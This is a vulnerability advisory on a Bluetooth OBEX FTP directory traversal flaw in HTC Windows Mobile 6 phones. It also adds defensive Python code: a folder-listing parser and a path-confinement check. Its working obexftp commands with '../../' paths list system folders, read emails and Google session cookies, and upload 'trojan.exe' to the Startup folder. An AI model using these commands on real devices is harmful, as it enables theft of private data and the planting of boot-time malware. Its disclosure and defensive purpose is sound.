Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal
Summary
HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder.
Description
HTC / Windows Mobile phones currently ship with a Bluetooth stack that provides Bluetooth communication with other remote devices. The File Transfer Profile (OBEX FTP) is one of the Bluetooth services that may be implemented in the stack.

The following example is the output of a command for finding nearby devices that support the File Transfer Profile (FTP) with sdptool, a tool available on Linux since kernel version 2.4.6. Given the known profile name FTP, the command searches for Bluetooth devices nearby and inquires whether the File Transfer Profile (FTP) is supported.
gospel@ubuntu:~$ sdptool search FTP
Inquiring ...
Searching for FTP on 00:17:83:02:BA:3C ...
Service Name: FTP
Service RecHandle: 0x10006
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2
  "OBEX" (0x0008)
Language Base Attr List:
  code_ISO639: 0x656e
  encoding:    0x6a
  base_offset: 0x100
Profile Descriptor List:
  "OBEX File Transfer" (0x1106)
    Version: 0x0100
The OBEX FTP Service
The OBEX FTP service can be used to share files over the Bluetooth wireless communications protocol. This service can be used for sending files from the phone to other remote devices but also allows remote devices to browse shared folders and download files from the phone.
The OBEX FTP service installed in Windows Mobile phones is accessible from a PC by using an OBEX FTP client, such as ObexFTP or gnomevfs-ls on Linux.
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of the phone and no path (or the default path /), the command retrieves the contents of the default directory of the FTP server.
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l
Browsing 00:17:83:02:BA:3C ...
Connecting..\done
Tried to connect for 26ms
Receiving "(null)"...
|<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="" />
<file name="foto.jpg" created="20090304T042644Z" size="134680"/>
<file name="nota.pwi" created="20090304T043402Z" size="524"/>
</folder-listing>
done
Disconnecting../done
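The folder-listing document returned above is plain XML and can be consumed programmatically, for instance when auditing what a device exposes over Bluetooth. The parser below is an added example written for this write-up; it is not part of ObexFTP or of the HTC service. The sample listing embedded in it is the one returned above (constructed as a string here), and the Entry type and the function names are this example's own.

```python
"""
Parser for the OBEX folder-listing XML that the FTP service returns for a
directory listing. Added example for this advisory, not code from ObexFTP
or the HTC service; it uses only the Python standard library.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional, Tuple

# Constructed sample: the listing of the default shared folder shown in
# the advisory, exactly as the server returns it.
SAMPLE_LISTING = """<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="" />
<file name="foto.jpg" created="20090304T042644Z" size="134680"/>
<file name="nota.pwi" created="20090304T043402Z" size="524"/>
</folder-listing>
"""


@dataclass
class Entry:
    kind: str                    # "file" or "folder"
    name: str
    created: Optional[datetime]  # None when the attribute is absent
    size: Optional[int]          # folders carry no size attribute


def parse_timestamp(value: Optional[str]) -> Optional[datetime]:
    """OBEX timestamps use the ISO 8601 basic form, e.g. 20090304T042644Z.
    A trailing Z marks UTC; without it the time is local to the device."""
    if not value:
        return None
    return datetime.strptime(value.rstrip("Z"), "%Y%m%dT%H%M%S")


def parse_folder_listing(xml_text: str) -> Tuple[Optional[str], List[Entry]]:
    """Return (parent-folder name, entries) from a folder-listing document.
    The DOCTYPE names an external DTD; ElementTree's expat parser does not
    fetch it, so the document parses offline."""
    root = ET.fromstring(xml_text)
    if root.tag != "folder-listing":
        raise ValueError(f"unexpected root element {root.tag!r}")
    parent = root.find("parent-folder")
    parent_name = parent.get("name") if parent is not None else None
    entries: List[Entry] = []
    for el in root:
        if el.tag not in ("file", "folder"):
            continue  # ignore anything the DTD may add that we do not model
        size = el.get("size")
        entries.append(Entry(
            kind=el.tag,
            name=el.get("name", ""),
            created=parse_timestamp(el.get("created")),
            size=int(size) if size is not None else None,
        ))
    return parent_name, entries


def total_file_bytes(entries: List[Entry]) -> int:
    """Sum of the sizes of all file entries (folders contribute nothing)."""
    return sum(e.size or 0 for e in entries if e.kind == "file")


if __name__ == "__main__":
    parent, entries = parse_folder_listing(SAMPLE_LISTING)
    print(f"parent folder: {parent!r}")
    for e in entries:
        print(f"{e.kind:6} {e.name:30} {e.size} {e.created}")
    print("total file bytes:", total_file_bytes(entries))
```

The parser keeps the parent-folder name because later listings in this write-up use it to show where in the tree a listing was taken; an auditing script can compare that name against the configured share folder to spot listings served from outside it.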
The following example is the output of a command for downloading a file with ObexFTP. Given the Bluetooth MAC address of the mobile phone and the path name nota.pwi, the command retrieves the file.
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -g nota.pwi
Browsing 00:17:83:02:BA:3C ...
Connecting..\done
Tried to connect for 28ms
Receiving "nota.pwi"...-done
Disconnecting..\done
gospel@ubuntu:~$ ls
bluez    Documents  Pictures  nota.pwi  Videos
Desktop  Downloads  Music     Public    Templates
The FTP service is configured so that one specific directory is shared, and the user places the files to be shared in it. The default directory is My Device\My Documents\Bluetooth Share (in the English edition) or My Device\My Documents\Compartimiento de Bluetooth (in the Spanish edition). A different directory may be selected; however, the user is not allowed to choose any directory outside the My Device\My Documents\ or Memory Card\ paths. This is a security measure, so that users cannot expose sensitive files over Bluetooth.

The OBEX FTP Service Directory Traversal vulnerability
There exists a Directory Traversal vulnerability in the OBEX FTP Service of the Bluetooth stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states that this is a third-party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability affects this vendor specifically.
A remote attacker (who has previously obtained authentication and authorization) can use tools such as ObexFTP or gnomevfs-ls on Linux to traverse to parent directories outside the default Bluetooth shared folder by using ../ or ..\\ sequences.
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based phone and the path ../../, the command retrieves the contents of the parent of the default directory of the FTP server, that is, the root directory of the device file system.
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l "../../"
Browsing 00:17:83:02:BA:3C ...
Connecting..\done
Tried to connect for 31ms
Receiving "../../"... Sending ".."...|Sending "..".../done
\<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name=".." />
<folder name="Documents and Settings" created="20081021T030002Z"/>
<folder name="Windows" created="20081021T030004Z"/>
<folder name="Temp" created="20081021T030004Z"/>
<folder name="My Documents" created="20081021T030012Z"/>
<folder name="Program Files" created="20081021T030012Z"/>
<file name="mxip_initdb.vol" created="20081020T182204Z" size="53248"/>
<file name="mxip_notify.vol" created="20080818T224126Z" size="32768"/>
<file name="mxip_swmgmt.vol" created="20080818T224130Z" size="135168"/>
<file name="mxip_system.vol" created="20080818T224128Z" size="155648"/>
<file name="mxip_lang.vol" created="20080818T224128Z" size="53248"/>
<folder name="Application Data" created="20081021T030032Z"/>
<folder name="ConnMgr" created="20081021T030056Z"/>
<file name="cemail.vol" created="20081021T030312Z" size="163840"/>
<file name="pim.vol" created="20081021T030340Z" size="323584"/>
</folder-listing>
done
Disconnecting..|done
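The defect behind the listing above is that the server does not confine client-supplied paths to the configured share folder before touching the file system. The check below is an added example of how an OBEX FTP server should resolve such paths; it was written for this write-up and is not taken from obexfile.dll. It assumes a server that tracks the client's position as path components under the share root, uses the two default share folders named earlier as constructed roots, and handles both the ../ and ..\ forms this advisory mentions, so it also covers the browse, download and upload cases described in the scope section.

```python
"""
Path-confinement check of the kind an OBEX FTP server should apply to every
client-supplied path name (SETPATH, GET, PUT) before touching the file system.

Added example for this advisory; it is not HTC's obexfile.dll code. It
assumes the server keeps the client's position as a list of path components
rooted at the configured share directory.
"""
from typing import List, Optional, Tuple

# Constructed share roots, taken from the advisory's description of the
# default shared folders (English and Spanish editions).
SHARE_ROOT_EN = r"\My Device\My Documents\Bluetooth Share"
SHARE_ROOT_ES = r"\My Device\My Documents\Compartimiento de Bluetooth"


def split_components(path: str) -> List[str]:
    """Split a client path on both '/' and '\\', dropping empty and '.' parts.
    OBEX clients may send either separator, so both must be treated alike;
    treating only one of them is a classic way to leave the other as a bypass."""
    parts: List[str] = []
    for part in path.replace("\\", "/").split("/"):
        if part in ("", "."):
            continue
        parts.append(part)
    return parts


def confine(share_root: str, requested: str) -> Optional[str]:
    """Resolve `requested` relative to `share_root`.

    Returns the absolute target path if it stays inside the share, or None
    if any '..' component would climb above the share root. The walk is done
    component by component so that sequences such as 'a/../../x' are caught
    at the exact step where they would leave the share.
    """
    root_parts = split_components(share_root)
    depth = 0                      # levels below the share root so far
    resolved: List[str] = []
    for part in split_components(requested):
        if part == "..":
            if depth == 0:
                return None        # attempt to leave the share: reject
            resolved.pop()
            depth -= 1
        else:
            resolved.append(part)
            depth += 1
    return "\\" + "\\".join(root_parts + resolved)


def audit_requests(share_root: str,
                   requests: List[str]) -> List[Tuple[str, str, Optional[str]]]:
    """Classify a batch of client paths as ALLOW/DENY with the resolved target,
    e.g. for a server-side log of rejected traversal attempts."""
    out = []
    for req in requests:
        target = confine(share_root, req)
        out.append((req, "ALLOW" if target is not None else "DENY", target))
    return out


if __name__ == "__main__":
    # Constructed sample of requests, including the traversal forms that
    # appear in the advisory (forward-slash and backslash variants).
    sample = [
        "",
        "nota.pwi",
        "sub/../nota.pwi",
        "../../",
        "../../My Documents/",
        "..\\..\\Windows\\Inicio",
        "a/../../x",
    ]
    for req, verdict, target in audit_requests(SHARE_ROOT_ES, sample):
        print(f"{verdict:5} {req!r:32} -> {target}")
```

The resolution walks the components instead of searching the string for "..": a bare substring check would reject a legitimate file whose name merely contains two dots, and a prefix check on a naively joined string would still accept a path that descends one level and then climbs two. Any server that cannot express the client's position this way should at least canonicalize the joined path and verify that it still starts with the share root followed by a separator.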
Requirements to exploit the vulnerability
The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing with the remote device should be enough to obtain them; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, link key cracking and MAC address spoofing, can be used to avoid pairing. Once the attacker has obtained the proper privileges, subsequent actions are invisible to the user.
Devices must have Bluetooth enabled and the File Sharing over Bluetooth service active when the attack is performed.

Scope of the attack
The Directory Traversal vulnerability allows the attacker to traverse to parent directories outside the default Bluetooth shared folder by using ../ or ..\\ sequences. This flaw allows browsing folders located anywhere in the file system, downloading files from any folder and uploading files to any folder.
1) Browse directories located out of the limits of the default shared folder
An attacker can discover the structure of the device file system and access any directory, including:
- The flash hard drive
- The external storage card
- The internal mass storage memory, included in devices such as the HTC TOUCH™ DIAMOND
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based phone and the path ../../My Documents/, the command retrieves the contents of the directory /My Documents/ in the device file system. This directory usually stores the user's personal files, such as pictures, videos and documents.
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l "../../My Documents/"
Browsing 00:17:83:02:BA:3C ...
Connecting..\done
Tried to connect for 29ms
Receiving "../../My Documents/"... Sending ".."...|Sending "..".../Sending "My Documents"...-done
\<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="My Documents" />
<folder name="Mis imagenes" created="20081021T030012Z"/>
<folder name="Mis videos" created="20081021T030012Z"/>
<folder name="Personal" created="20081021T030014Z"/>
<folder name="Mi musica" created="20081021T030014Z"/>
<folder name="Templates" created="20081021T030014Z"/>
<folder name="UAContents" created="20081021T030014Z"/>
<folder name="Plantillas" created="20081021T030434Z"/>
<folder name="Llamadas" created="20081021T030434Z"/>
<folder name="Compartimiento de Bluetooth" created="20090131T070342Z"/>
</folder-listing>
done
Disconnecting..|done
The following example is the output of a command for listing a directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based phone and the path ../../Tarjeta de Almacen./My Documents/, the command retrieves contents from the external storage card, which usually holds the user's private data.
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l "../../Tarjeta de Almacen./My Documents/"
Browsing 00:17:83:02:BA:3C ...
Connecting..\done
Tried to connect for 43ms
Receiving "../../Tarjeta de Almacen./My Documents/"... Sending ".."...|Sending "..".../done
-<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="My Documents" />
<folder name="Mis imagenes" created="16010101T000000Z"/>
<folder name="Mis videos" created="16010101T000000Z"/>
<folder name="Mis temas" created="16010101T000000Z"/>
<folder name="Mis CABs" created="16010101T000000Z"/>
<folder name="Mis cosas privadas" created="16010101T000000Z"/>
<folder name="Mis POI" created="16010101T000000Z"/>
</folder-listing>
done
Disconnecting..\done
The file system can likewise be browsed with the Nautilus file manager.
2) Download files without permission
An attacker can download sensitive files located anywhere in the file system, such as:
- Personal pictures and documents located in \My Documents or any other directory
- Emails located in \Windows\Messaging

The following example is the output of commands for listing a directory and reading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based phone and the path ../../Windows/Messaging/, the command retrieves the contents of the directory where emails from the Outlook application are stored. Emails are stored in plain text and can therefore be read remotely.
gospel@ubuntu:~$ obexftp -b 00:21:BA:D4:72:28 -l "../../Windows/Messaging/"
Browsing 00:21:BA:D4:72:28 ...
Connecting..\done
Tried to connect for 33ms
Receiving "../../Windows/Messaging/"... Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Messaging"...\done
|<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Messaging" />
<folder name="Attachments" created="20081021T030312Z"/>
<file name="9634000081030102.mpb" created="20101020T014408Z" size="1585"/>
<file name="9c31000081030102.mpb" created="20090304T035018Z" size="2462"/>
<file name="a935000081030102.mpb" created="20090304T035026Z" size="2910"/>
<file name="ad37000081030102.mpb" created="20090304T035030Z" size="2494"/>
<file name="9132000081030102.mpb" created="20101020T014408Z" size="3596"/>
</folder-listing>
done
Disconnecting../done
gospel@ubuntu:~$ obexftp -b 00:21:BA:D4:72:28 -l "../../Windows/Messaging/9634000081030102.mpb"
Browsing 00:21:BA:D4:72:28 ...
Connecting..\done
Tried to connect for 475ms
Receiving "../../Windows/Messaging/9634000081030102.mpb"... Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Messaging"...\done
/Return-Path: <jean-luc@email.jp>
X-Original-To: alberto@cipher.risk.*******.ac.jp
Delivered-To: alberto@cipher.risk.*******.ac.jp
Received: by server.*******.ac.jp (Postfix) with ESMTP id E20848AFE76
for <alberto@cipher.risk.*******.ac.jp>; Wed, 20 Oct 2010 10:30:12 +0900 (JST)
Message-ID: <12345.2010601@*******.ac.jp>
Date: Wed, 20 Oct 2010 10:42:23 +0900
From: Jean-Luc <jean-luc@email.jp>
Reply-To: jean-luc@email.jp
User-Agent: Mozilla/5.0
MIME-Version: 1.0
To: alberto@cipher.risk.*******.ac.jp
Subject: Test
X-Enigmail-Version: 1.1.1
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Hi Alberto,
Here is a short message ;)
Jean-Luc
done
Disconnecting..-done
- Temporary internet cache and cookies located in \Windows\Profiles\guest\
The following example is the output of commands for listing a directory and reading a file with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based phone and the path ../../Windows/Profiles/Guest/Cookies/, the command retrieves the contents of the directory where cookies from the Internet Explorer application are stored. Cookies are stored in plain text and can therefore be read remotely.
gospel@ubuntu:~$ obexftp -b 00:21:BA:D4:72:28 -l "../../Windows/Profiles/Guest/Cookies"
Browsing 00:21:BA:D4:72:28 ...
Connecting..\done
Tried to connect for 28ms
Receiving "../../Windows/Profiles/Guest/Cookies"... Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Profiles"...\Sending "Guest"...|done
/<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Guest" />
<file name="index.dat" created="20081021T030040Z" size="32768"/>
<file name="guest@verify[1].txt" created="20101020T041656Z" size="131"/>
<file name="guest@verify[2].txt" created="20101020T040958Z" size="133"/>
<file name="guest@google.co[2].txt" created="20101020T042802Z" size="899"/>
<file name="guest@google[2].txt" created="20101020T042802Z" size="1050"/>
<file name="guest@calendar[1].txt" created="20101020T042758Z" size="321"/>
<file name="guest@accounts[3].txt" created="20101020T042812Z" size="373"/>
<file name="guest@accounts[2].txt" created="20101020T042802Z" size="429"/>
</folder-listing>
done
Disconnecting..-done
gospel@ubuntu:~$ obexftp -b 00:21:BA:D4:72:28 -l "../../Windows/Profiles/Guest/Cookies/guest@accounts[2].txt"
Browsing 00:21:BA:D4:72:28 ...
Connecting..\done
Tried to connect for 34ms
Receiving "../../Windows/Profiles/Guest/Cookies/guest@accounts[2].txt"... Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Profiles"...
\Sending "Guest"...|Sending "Cookies".../done
-LSID
cl|s.JP:DQAAAKcAAAAYF_ib2DAWOSLAxaWV4gswBEsiPWnCg3TkH1K4Ku4auJs13nItoUDJr6cANVK2RSEN8bwObv3Ih
LmBpOytKpafSc9QIV3zuGS0cQdQ0V5XO5GMH0uBFrWXZuHm8gK6GYWHKZP31WJIkR0cZNyTCqCecSfFJI40QyFLqR1HTh
fJxqzmO9UCTdwQPJrHGaK1053qGUxofQTzSRsH-8PRhbBieoGBcSTLk-cKamdvao_5Q
www.google.com/accounts
1024
4036031360
30843965
792988544
30109711
*
GAUSR
***********@gmail.com
www.google.com/accounts
1024
3913696030
33960845
758542984
30971101
*
done
Disconnecting..\done
3) Upload malicious files
Since it is possible to upload files to the file system, exploiting this issue may lead to code execution. An attacker can replace system .exe files with malicious files or upload trojans anywhere in the file system, such as \Windows\Startup (\Windows\Inicio in the Spanish edition), from where they are executed the next time Windows Mobile boots.
The following example is the output of commands for uploading a file and listing the destination directory with ObexFTP. Given the Bluetooth MAC address of an HTC / Windows Mobile based phone and the path name ..\..\Windows\Inicio, the command uploads the file to the startup folder of Windows Mobile, from where it is executed the next time the operating system boots.
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Inicio" -p trojan.exe
Browsing 00:17:83:02:BA:3C ...
Connecting..\done
Tried to connect for 20ms
Sending ".."...|Sending "..".../Sending "Windows"...-Sending "Inicio"...\done
Sending "trojan.exe"...|done
Disconnecting../done
gospel@ubuntu:~$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Inicio"
Browsing 00:17:83:02:BA:3C ...
Connecting..\done
Tried to connect for 37ms
Receiving "../../Windows/Inicio"... Sending ".."...|Sending "..".../Sending "Windows"...-done
\<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Windows" />
<file name="poutlook.lnk" created="20081021T030014Z" size="14"/>
<file name="trojan.exe" created="20101025T082104Z" size="11"/>
</folder-listing>
done
Disconnecting..|done

